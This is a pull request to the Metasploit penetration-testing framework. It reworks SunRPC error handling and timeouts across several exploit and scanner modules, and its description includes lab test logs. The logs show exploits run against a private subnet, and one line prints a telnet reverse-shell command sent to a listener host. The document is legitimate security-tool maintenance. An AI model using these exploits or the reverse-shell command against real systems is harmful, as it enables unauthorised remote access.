### PR TITLE
SunRPC lib and module cleanup

### DIFF
--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -51,13 +51,13 @@ module Exploit::Remote::SunRPC
     )
   end
 
-  def sunrpc_create(protocol, program, version, timeout = timeout)
+  def sunrpc_create(protocol, program, version, time_out = timeout)
     self.rpcobj = Rex::Proto::SunRPC::Client.new(
       :rhost => rhost,
       :rport => rport.to_i,
       :proto => protocol,
       :program => program,
-      :timeout => timeout,
+      :timeout => time_out,
       :version => version,
       :context => {
         'Msf'        => framework,

--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -38,7 +38,7 @@ module Exploit::Remote::SunRPC
 
     register_advanced_options(
       [
-        OptInt.new('TIMEOUT', [true, 'Number of seconds to wait for responses to RPC calls', 5])
+        OptInt.new('TIMEOUT', [true, 'Number of seconds to wait for responses to RPC calls', 20])
         # XXX: Use portmapper to do call - Direct portmap to make the request to the program portmap_req
       ], Msf::Exploit::Remote::SunRPC)
 

--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -38,24 +38,26 @@ module Exploit::Remote::SunRPC
 
     register_advanced_options(
       [
-# XXX: Use portmapper to do call - Direct portmap to make the request to the program portmap_req
+        OptInt.new('TIMEOUT', [true, 'Number of seconds to wait for responses to RPC calls', 5])
+        # XXX: Use portmapper to do call - Direct portmap to make the request to the program portmap_req
       ], Msf::Exploit::Remote::SunRPC)
 
     register_options(
       [
-# XXX: XPORT
+        # XXX: XPORT
         Opt::RHOST,
         Opt::RPORT(111),
       ], Msf::Exploit::Remote::SunRPC
     )
   end
 
-  def sunrpc_create(protocol, program, version)
+  def sunrpc_create(protocol, program, version, timeout = timeout)
     self.rpcobj = Rex::Proto::SunRPC::Client.new(
       :rhost => rhost,
       :rport => rport.to_i,
       :proto => protocol,
       :program => program,
+      :timeout => timeout,
       :version => version,
       :context => {
         'Msf'        => framework,
@@ -82,7 +84,7 @@ module Exploit::Remote::SunRPC
     rpcobj.pport = arr[5]
   end
 
-  def sunrpc_call(proc, buf, timeout=20)
+  def sunrpc_call(proc, buf, timeout = timeout)
     ret = rpcobj.call(proc, buf, timeout)
     raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to SunRPC call for procedure: #{proc}" unless ret
 
@@ -155,6 +157,11 @@ module Exploit::Remote::SunRPC
     end
 
     return "UNKNOWN-#{number}"
+  end
+
+  # Returns the time that this module will wait for RPC responses, in seconds
+  def timeout
+    datastore['TIMEOUT']
   end
 
   # Used to track the last SunRPC context

--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -38,7 +38,7 @@ module Exploit::Remote::SunRPC
 
     register_advanced_options(
       [
-        OptInt.new('TIMEOUT', [true, 'Number of seconds to wait for responses to RPC calls', 20])
+        OptInt.new('TIMEOUT', [true, 'Number of seconds to wait for responses to RPC calls', 5])
         # XXX: Use portmapper to do call - Direct portmap to make the request to the program portmap_req
       ], Msf::Exploit::Remote::SunRPC)
 

--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -68,7 +68,7 @@ module Exploit::Remote::SunRPC
     end
 
     ret = rpcobj.create
-    return print_error("#{rhost}:#{rport} - SunRPC - No response to Portmap request") unless ret
+    raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to Portmap request" unless ret
 
     arr = XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
     if arr[1] != MSG_ACCEPTED || arr[4] != SUCCESS || arr[5] == 0
@@ -76,18 +76,15 @@ module Exploit::Remote::SunRPC
       err << 'Message not accepted'  if arr[1] != MSG_ACCEPTED
       err << 'RPC did not execute'   if arr[4] != SUCCESS
       err << 'Program not available' if arr[5] == 0
-      print_error(err)
-      return nil
+      raise ::Rex::Proto::SunRPC::RPCError, err
     end
 
     rpcobj.pport = arr[5]
-    #progname = progresolv(rpcobj.program)
-    #print_status("#{rhost} - SunRPC Found #{progname} on #{protocol} port #{rpcobj.pport}")
   end
 
   def sunrpc_call(proc, buf, timeout=20)
     ret = rpcobj.call(proc, buf, timeout)
-    return print_error("#{rhost}:#{rport} - SunRPC - No response to SunRPC call for procedure: #{proc}") unless ret
+    raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to SunRPC call for procedure: #{proc}" unless ret
 
     arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer, String, Integer)
     if arr[1] != MSG_ACCEPTED || arr[4] != SUCCESS
@@ -105,8 +102,7 @@ module Exploit::Remote::SunRPC
           else err << "Unknown Error"
         end
       end
-      print_error("#{rhost}:#{rport} - SunRPC - #{err}")
-      return nil
+      raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - #{err}"
     end
     return ret
   end
@@ -142,8 +138,7 @@ module Exploit::Remote::SunRPC
         when GARBAGE_ARGS  then err << "Garbage Arguments"
         else err << "Unknown Error"
       end
-      print_error("#{rhost}:#{rport} - SunRPC - #{err}")
-      return nil
+      raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - #{err}"
     end
 
     return ret

--- a/lib/rex/proto/sunrpc/client.rb
+++ b/lib/rex/proto/sunrpc/client.rb
@@ -6,10 +6,21 @@ module Rex
 module Proto
 module SunRPC
 
+class RPCError < ::StandardError
+  def initialize(msg = 'RPC operation failed')
+    super
+    @msg = msg
+  end
+
+  def to_s
+    @msg
+  end
+end
+
 class RPCTimeout < ::Interrupt
-   def initialize(msg = 'Operation timed out.')
-      @msg = msg
-   end
+  def initialize(msg = 'Operation timed out.')
+    @msg = msg
+  end
 
   def to_s
     @msg

--- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
+++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
@@ -127,6 +127,8 @@ class Metasploit3 < Msf::Auxiliary
     # done
     sunrpc_destroy
 
+  rescue ::Rex::Proto::SunRPC::RPCError => e
+    vprint_error(e.to_s)
   rescue ::Rex::Proto::SunRPC::RPCTimeout
     print_warning 'Warning: ' + $!
     print_warning 'Exploit may or may not have succeeded.'

--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -6,22 +6,21 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
-
   include Msf::Exploit::Remote::SunRPC
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
   def initialize
     super(
-      'Name'          => 'SunRPC Portmap Program Enumerator',
-      'Description'   => %q{
-          This module calls the target portmap service and enumerates all
-        program entries and their running port numbers.
-      },
-      'Author'	       => ['<tebo[at]attackresearch.com>'],
-      'References'	 =>
+      'Name'        => 'SunRPC Portmap Program Enumerator',
+      'Description' => '
+        This module calls the target portmap service and enumerates all program
+        entries and their running port numbers.
+      ',
+      'Author'      => ['<tebo[at]attackresearch.com>'],
+      'References'  =>
         [
-          ['URL',	'http://www.ietf.org/rfc/rfc1057.txt'],
+          ['URL',	'http://www.ietf.org/rfc/rfc1057.txt']
         ],
       'License'	=> MSF_LICENSE
     )
@@ -37,15 +36,14 @@ class Metasploit3 < Msf::Auxiliary
       procedure	= 4
 
       sunrpc_create('udp', program, progver)
-      sunrpc_authnull()
+      sunrpc_authnull
       resp = sunrpc_call(procedure, "")
 
-      progs = resp[3,1].unpack('C')[0]
+      progs = resp[3, 1].unpack('C')[0]
       maps = []
       if (progs == 0x01)
-        while XDR.decode_int!(resp) == 1 do
-          map = XDR.decode!(resp, Integer, Integer, Integer, Integer)
-          maps << map
+        while XDR.decode_int!(resp) == 1
+          maps << XDR.decode!(resp, Integer, Integer, Integer, Integer)
         end
       end
       sunrpc_destroy
@@ -53,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary
       print_good("#{peer} - Found #{maps.size} programs available")
 
       table = Rex::Ui::Text::Table.new(
-        'Header'  => "SunRPC Programs for #{ip}.",
+        'Header'  => "SunRPC Programs for #{ip}",
         'Indent'  => 1,
         'Columns' => %w(Name Number Version Port Protocol)
       )
 
       maps.each do |map|
-        prog, vers, prot_num, port = map[0,4]
+        prog, vers, prot_num, port = map[0, 4]
         thing = "RPC Program ##{prog} v#{vers} on port #{port} w/ protocol #{prot_num}"
         if prot_num == 0x06
           proto = 'tcp'
@@ -73,11 +71,11 @@ class Metasploit3 < Msf::Auxiliary
         resolved = progresolv(prog)
         table << [ resolved, prog, vers, port, proto ]
         report_service(
-          :host => ip,
-          :port => port,
-          :proto => proto,
-          :name => resolved,
-          :info => "Prog: #{prog} Version: #{vers} - via portmapper"
+          host: ip,
+          port: port,
+          proto: proto,
+          name: resolved,
+          info: "Prog: #{prog} Version: #{vers} - via portmapper"
         )
       end
 
@@ -85,5 +83,4 @@ class Metasploit3 < Msf::Auxiliary
     rescue ::Rex::Proto::SunRPC::RPCTimeout
     end
   end
-
 end

--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
       progver		= 2
       procedure	= 4
 
-      sunrpc_create('udp', program, progver)
+      return unless sunrpc_create('udp', program, progver)
       sunrpc_authnull
       resp = sunrpc_call(procedure, "")
 
@@ -80,7 +80,8 @@ class Metasploit3 < Msf::Auxiliary
       end
 
       print_good(table.to_s)
-    rescue ::Rex::Proto::SunRPC::RPCTimeout
+    rescue ::Rex::Proto::SunRPC::RPCTimeout, ::Rex::Proto::SunRPC::RPCError => e
+      vprint_error(e.to_s)
     end
   end
 end

--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
       end
       sunrpc_destroy
       return if maps.empty?
-      print_good("#{peer} - Found #{maps.size} programs available")
+      vprint_good("#{peer} - Found #{maps.size} programs available")
 
       table = Rex::Ui::Text::Table.new(
         'Header'  => "SunRPC Programs for #{ip}",

--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
       progver		= 2
       procedure	= 4
 
-      return unless sunrpc_create('udp', program, progver)
+      sunrpc_create('udp', program, progver)
       sunrpc_authnull
       resp = sunrpc_call(procedure, "")
 

--- a/modules/auxiliary/scanner/nfs/nfsmount.rb
+++ b/modules/auxiliary/scanner/nfs/nfsmount.rb
@@ -76,11 +76,12 @@ class Metasploit3 < Msf::Auxiliary
           :update => :unique_data
         )
       elsif(exports == 0x00)
-        print_status("#{ip} - No exported directories")
+        vprint_status("#{ip} - No exported directories")
       end
 
       sunrpc_destroy
-    rescue ::Rex::Proto::SunRPC::RPCTimeout
+    rescue ::Rex::Proto::SunRPC::RPCTimeout, ::Rex::Proto::SunRPC::RPCError => e
+      vprint_error(e.to_s)
     end
   end
 

--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -103,9 +103,11 @@ class Metasploit3 < Msf::Exploit::Remote
       sunrpc_destroy
 
     rescue Rex::Proto::SunRPC::RPCTimeout
-      # print_error('RPCTimeout')
+      vprint_error('RPCTimeout')
+    rescue Rex::Proto::SunRPC::RPCError => e
+      vprint_error(e.to_s)
     rescue EOFError
-      # print_error('EOFError')
+      vprint_error('EOFError')
     end
   end
 

--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -80,9 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
 
     begin
-      if (not sunrpc_create('udp', 100068, 4))
-        fail_with(Failure::Unknown, 'sunrpc_create failed')
-      end
+      sunrpc_create('udp', 100068, 4)
 
       # spray the heap a bit (work around powerpc cache issues)
       buf = make_nops(1024 - @aixpayload.length)

--- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
@@ -98,7 +98,12 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def brute_exploit(brute_target)
-    sunrpc_create('udp', 100232, 10)
+    begin
+      sunrpc_create('udp', 100232, 10)
+    rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e
+      vprint_error(e.to_s)
+      return
+    end
 
     unless @nops
       print_status('Creating nop block...')
@@ -145,6 +150,8 @@ class Metasploit3 < Msf::Exploit::Remote
       sunrpc_call(1, request, 2)
     rescue Rex::Proto::SunRPC::RPCTimeout
       print_status('Server did not respond, this is expected')
+    rescue Rex::Proto::SunRPC::RPCError => e
+      print_error(e.to_s)
     end
 
     sunrpc_destroy

--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -74,9 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     begin
-      if (not sunrpc_create('tcp', 0x5F3DD, 2))
-        fail_with(Failure::Unknown, 'sunrpc_create failed')
-      end
+      sunrpc_create('tcp', 0x5F3DD, 2)
 
       fs = "%n" * target['Offset']
       fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll


### PR DESCRIPTION
In #3767, I made some changes to the XDR code to address some defects, but in doing that I had to test the modules that use this code.  Unfortunately, many of them are painful to use in various ways:
- Inconsistent `*print_*` usage, leading to bad and inconsistent experiences when running
- There was a timeout, but it was buried, therefore many of these modules would wait for 20s on a host that didn't even offer RPC services, making scanning larger `RHOSTS` really painful.  I exposed this as an option and set it to something more sane, 5s.

Functionality wise, at least with respect to how each host is handled, should be unchanged.
## Validation
- [ ] Locate some hosts exposing RPC services of some sort
- [ ] Run the affected modules against all of them, perhaps, confirming that the end result has improved:
  - [ ] exploits/solaris/sunrpc/sadmind_exec
  - [ ] exploits/solaris/sunrpc/sadmind_adm_build_path
  - [ ] exploits/solaris/sunrpc/ypupdated_exec
  - [ ] exploits/windows/emc/networker_format_string
  - [ ] exploits/windows/brightstor/mediasrv_sunrpc
  - [ ] exploits/aix/rpc_cmsd_opcode21
  - [ ] exploits/aix/rpc_ttdbserverd_realpath
  - [ ] auxiliary/scanner/nfs/nfsmount
  - [ ] auxiliary/scanner/misc/sunrpc_portmapper
  - [ ] auxiliary/admin/sunrpc/solaris_kcms_readfile

I have a /24 littered with hosts exposing Sun RPC, so I used the following file to test this before/after:

```
workspace -d sunrpc_cleanup
workspace -a sunrpc_cleanup
setg RHOSTS 192.168.32.0/24
setg RHOST 192.168.32.69
setg THREADS 10
use exploit/solaris/sunrpc/sadmind_exec
run
use exploit/solaris/sunrpc/sadmind_adm_build_path
run
use exploit/solaris/sunrpc/ypupdated_exec
run
use exploit/windows/emc/networker_format_string
run
use exploit/windows/brightstor/mediasrv_sunrpc
run
use exploit/aix/rpc_cmsd_opcode21
run
use exploit/aix/rpc_ttdbserverd_realpath
run
use auxiliary/scanner/nfs/nfsmount
run
use auxiliary/scanner/misc/sunrpc_portmapper
run
use auxiliary/admin/sunrpc/solaris_kcms_readfile
run
```

Before:

```
resource (/tmp/sun.rc)> use exploit/solaris/sunrpc/sadmind_exec
resource (/tmp/sun.rc)> run
[*] Started reverse double handler
[-] 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
[*] attempting to determine hostname
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
resource (/tmp/sun.rc)> use exploit/solaris/sunrpc/sadmind_adm_build_path
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[-] 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
[*] Creating nop block...
[*] Trying to exploit sadmind with address 0x08062030...
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
resource (/tmp/sun.rc)> use exploit/solaris/sunrpc/ypupdated_exec
resource (/tmp/sun.rc)> run
[*] Started reverse double handler
[*] Sending PortMap request for ypupdated program
[-] 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
[*] Sending MAP UPDATE request with command 'sh -c '(sleep 3693|telnet 172.16.10.63 4444|while : ; do sh && break; done 2>&1|telnet 172.16.10.63 4444 >/dev/null 2>&1 &)''
[*] Waiting for response...
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
resource (/tmp/sun.rc)> use exploit/windows/emc/networker_format_string
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[-] 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
[-] Exploit failed: sunrpc_create failed
resource (/tmp/sun.rc)> use exploit/windows/brightstor/mediasrv_sunrpc
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[-] 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
[*] Trying target BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)...
resource (/tmp/sun.rc)> use exploit/aix/rpc_cmsd_opcode21
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[*] Trying to exploit rpc.cmsd with address 0x2022dfc8 ...
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
resource (/tmp/sun.rc)> use exploit/aix/rpc_ttdbserverd_realpath
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[*] Trying to exploit rpc.ttdbserverd with address 0x20097430...
[*] Sending procedure 15 call message...
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
resource (/tmp/sun.rc)> use auxiliary/scanner/nfs/nfsmount
resource (/tmp/sun.rc)> run
[*] Scanned  26 of 256 hosts (10% complete)
[*] Scanned  54 of 256 hosts (21% complete)
[+] 192.168.32.66 NFS Export: /tmp [localhost, aix7-1cis-nc1]
[+] 192.168.32.69 NFS Export: /export/home/share []
[+] 192.168.32.64 NFS Export: /tmp []
[+] 192.168.32.64 NFS Export: /var/tmp []
[-] 192.168.32.70:111 - SunRPC - Portmap request failed: Program not available
[-] 192.168.32.72:111 - SunRPC - Portmap request failed: Program not available
[+] 192.168.32.73 NFS Export: /tmp [localhost, aix7-1cis-nc1]
[*] Scanned  77 of 256 hosts (30% complete)
[-] 192.168.32.100:111 - SunRPC - Portmap request failed: Program not available
[-] 192.168.32.105:111 - SunRPC - Portmap request failed: Program not available
[-] 192.168.32.102:111 - SunRPC - Portmap request failed: Program not available
[-] 192.168.32.103:111 - SunRPC - Portmap request failed: Program not available
[+] 192.168.32.104 NFS Export: /tmp []
[+] 192.168.32.104 NFS Export: /var/tmp []
[+] 192.168.32.104 NFS Export: /var/msgs []
[*] Scanned 107 of 256 hosts (41% complete)
[-] 192.168.32.119:111 - SunRPC - Portmap request failed: Program not available
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/tmp/sun.rc)> use auxiliary/scanner/misc/sunrpc_portmapper
resource (/tmp/sun.rc)> run
[*] Scanned  27 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[+] 192.168.32.64:111 - Programs available
[+] 192.168.32.66:111 - Programs available
[+] 192.168.32.69:111 - Programs available
    rpcbind - 111/udp
    rpcbind - 111/tcp
    nfs - 2049/udp
    nfs - 2049/tcp
    UNKNOWN-200006 - 2049/udp
    UNKNOWN-200006 - 2049/tcp
    mountd - 32774/tcp
    mountd - 32862/udp
    UNKNOWN-400005 - 32863/udp
    rquotad - 32865/udp
    rstatd - 32866/udp
    rusersd - 32867/udp
    walld - 32868/udp
    sprayd - 32869/udp
    pcnfsd - 32870/udp
    ttdbserverd - 32776/tcp
    cmsd - 32871/udp
    nlockmgr - 32876/udp
    nlockmgr - 32777/tcp
    status - 32778/tcp
    status - 32875/udp
    nsm_addrand - 32778/tcp
    nsm_addrand - 32875/udp
    PyramidSys5 - 32778/tcp
    PyramidSys5 - 32875/udp
    rpcbind - 111/udp
    rpcbind - 111/tcp
    nfs - 2049/udp
    nfs - 2049/tcp
    UNKNOWN-200006 - 2049/udp
    UNKNOWN-200006 - 2049/tcp
    rquotad - 32832/udp
    rstatd - 32833/udp
    rusersd - 32835/udp
    walld - 32836/udp
    sprayd - 32837/udp
    pcnfsd - 32838/udp
    ttdbserverd - 32772/tcp
    cmsd - 32839/udp
    mountd - 32773/tcp
    mountd - 32840/udp
    UNKNOWN-400005 - 32841/udp
    nlockmgr - 33653/udp
    nlockmgr - 32788/tcp
    status - 32793/tcp
    status - 33884/udp
    nsm_addrand - 32793/tcp
    nsm_addrand - 33884/udp
    PyramidSys5 - 32793/tcp
    PyramidSys5 - 33884/udp
    rpcbind - 111/tcp
    rpcbind - 111/udp
    status - 32772/udp
    status - 32771/tcp
    nsm_addrand - 32772/udp
    nsm_addrand - 32771/tcp
    fmproduct - 32772/tcp
    nlockmgr - 4045/udp
    nlockmgr - 4045/tcp
    metad - 32775/tcp
    rstatd - 32775/udp
    cmsd - 32776/udp
    ttdbserverd - 32776/tcp
    mdcommd - 32777/tcp
    rpc.metamedd - 32778/tcp
    metamhd - 32779/tcp
    rusersd - 32780/tcp
    rusersd - 32777/udp
    rquotad - 32778/udp
    dmispd - 32787/udp
    dmispd - 32782/tcp
    snmpXdmid - 32789/udp
    snmpXdmid - 32783/tcp
    mountd - 33482/udp
    mountd - 33101/tcp
    nfs - 2049/udp
    nfs_acl - 2049/udp
    nfs - 2049/tcp
    nfs_acl - 2049/tcp
    cmsd - 34443/tcp

<trim lots of similar output, plus a ctrl-c by me because I can't wait>

[*] Auxiliary module execution completed
resource (/tmp/sun.rc)> use auxiliary/admin/sunrpc/solaris_kcms_readfile
resource (/tmp/sun.rc)> run
[*] Making request to the ToolTalk Database Server...
[*] TTDB reply: 0xffffffff, 2
[*] TTDB reply: 0xffffffff, 2
[*] Making open() request to the kcms_server...
[-] 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available

[-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.32.69:0).
[-] Call stack:
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/socket/comm/local.rb:302:in `rescue in create_by_type'
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/socket/comm/local.rb:274:in `create_by_type'
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/socket/comm/local.rb:33:in `create'
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/socket.rb:47:in `create_param'
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/socket.rb:40:in `create'
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/proto/sunrpc/client.rb:127:in `make_rpc'
[-]   /home/jhart/labs/git/metasploit-framework/lib/rex/proto/sunrpc/client.rb:85:in `call'
[-]   /home/jhart/labs/git/metasploit-framework/lib/msf/core/exploit/sunrpc.rb:89:in `sunrpc_call'
[-]   /home/jhart/labs/git/metasploit-framework/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb:78:in `run'
[*] Auxiliary module execution completed
```

After:

```
resource (/tmp/sun.rc)> use exploit/solaris/sunrpc/sadmind_exec
resource (/tmp/sun.rc)> run
[*] Started reverse double handler
[-] Exploit failed: Rex::Proto::SunRPC::RPCError 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
resource (/tmp/sun.rc)> use exploit/solaris/sunrpc/sadmind_adm_build_path
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
resource (/tmp/sun.rc)> use exploit/solaris/sunrpc/ypupdated_exec
resource (/tmp/sun.rc)> run
[*] Started reverse double handler
[*] Sending PortMap request for ypupdated program
[-] Exploit failed: Rex::Proto::SunRPC::RPCError 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
resource (/tmp/sun.rc)> use exploit/windows/emc/networker_format_string
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[-] Exploit failed: Rex::Proto::SunRPC::RPCError 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
resource (/tmp/sun.rc)> use exploit/windows/brightstor/mediasrv_sunrpc
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[-] Exploit failed: Rex::Proto::SunRPC::RPCError 192.168.32.69:111 - SunRPC - Portmap request failed: Program not available
resource (/tmp/sun.rc)> use exploit/aix/rpc_cmsd_opcode21
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[*] Trying to exploit rpc.cmsd with address 0x2022dfc8 ...
[*] Trying to exploit rpc.cmsd with address 0x2022e220 ...
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
resource (/tmp/sun.rc)> use exploit/aix/rpc_ttdbserverd_realpath
resource (/tmp/sun.rc)> run
[*] Started reverse handler on 172.16.10.63:4444 
[*] Trying to exploit rpc.ttdbserverd with address 0x20097430...
[*] Sending procedure 15 call message...
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
resource (/tmp/sun.rc)> use auxiliary/scanner/nfs/nfsmount
resource (/tmp/sun.rc)> run
[*] Scanned  29 of 256 hosts (11% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[+] 192.168.32.64 NFS Export: /tmp []
[+] 192.168.32.64 NFS Export: /var/tmp []
[+] 192.168.32.66 NFS Export: /tmp [localhost, aix7-1cis-nc1]
[+] 192.168.32.69 NFS Export: /export/home/share []
[+] 192.168.32.73 NFS Export: /tmp [localhost, aix7-1cis-nc1]
[*] Scanned  79 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[+] 192.168.32.104 NFS Export: /tmp []
[+] 192.168.32.104 NFS Export: /var/tmp []
[+] 192.168.32.104 NFS Export: /var/msgs []
[*] Scanned 129 of 256 hosts (50% complete)

<trim>

[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/tmp/sun.rc)> use auxiliary/scanner/misc/sunrpc_portmapper
resource (/tmp/sun.rc)> run
[*] Scanned  30 of 256 hosts (11% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[+] SunRPC Programs for 192.168.32.64
=================================

 Name            Number  Version  Port   Protocol
 ----            ------  -------  ----   --------
 PyramidSys5     200001  2        33884  udp
 PyramidSys5     200001  2        32793  tcp
 PyramidSys5     200001  1        33884  udp
 PyramidSys5     200001  1        32793  tcp
 UNKNOWN-200006  200006  1        2049   tcp
 UNKNOWN-200006  200006  4        2049   tcp
 UNKNOWN-200006  200006  4        2049   udp
 UNKNOWN-200006  200006  1        2049   udp
 UNKNOWN-400005  400005  1        32841  udp
 cmsd            100068  3        32839  udp
 cmsd            100068  5        32839  udp
 cmsd            100068  4        32839  udp
 cmsd            100068  2        32839  udp
 mountd          100005  1        32840  udp
 mountd          100005  3        32840  udp
 mountd          100005  2        32840  udp
 mountd          100005  3        32773  tcp
 mountd          100005  2        32773  tcp
 mountd          100005  1        32773  tcp
 nfs             100003  4        2049   tcp
 nfs             100003  2        2049   tcp
 nfs             100003  2        2049   udp
 nfs             100003  3        2049   udp
 nfs             100003  3        2049   tcp
 nlockmgr        100021  4        33653  udp
 nlockmgr        100021  1        33653  udp
 nlockmgr        100021  1        32788  tcp
 nlockmgr        100021  2        33653  udp
 nlockmgr        100021  3        33653  udp
 nlockmgr        100021  4        32788  tcp
 nlockmgr        100021  3        32788  tcp
 nlockmgr        100021  2        32788  tcp
 nsm_addrand     100133  1        32793  tcp
 nsm_addrand     100133  1        33884  udp
 pcnfsd          150001  1        32838  udp
 pcnfsd          150001  2        32838  udp
 rpcbind         100000  2        111    tcp
 rpcbind         100000  4        111    tcp
 rpcbind         100000  2        111    udp
 rpcbind         100000  3        111    udp
 rpcbind         100000  4        111    udp
 rpcbind         100000  3        111    tcp
 rquotad         100011  1        32832  udp
 rstatd          100001  3        32833  udp
 rstatd          100001  1        32833  udp
 rstatd          100001  2        32833  udp
 rusersd         100002  2        32835  udp
 rusersd         100002  1        32835  udp
 sprayd          100012  1        32837  udp
 status          100024  1        32793  tcp
 status          100024  1        33884  udp
 ttdbserverd     100083  1        32772  tcp
 walld           100008  1        32836  udp

<trim lots of similar output for other hosts>

[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/tmp/sun.rc)> use auxiliary/admin/sunrpc/solaris_kcms_readfile
resource (/tmp/sun.rc)> run
[*] Making request to the ToolTalk Database Server...
[*] TTDB reply: 0xffffffff, 2
[*] TTDB reply: 0xffffffff, 2
[*] Making open() request to the kcms_server...
[*] Auxiliary module execution completed

```
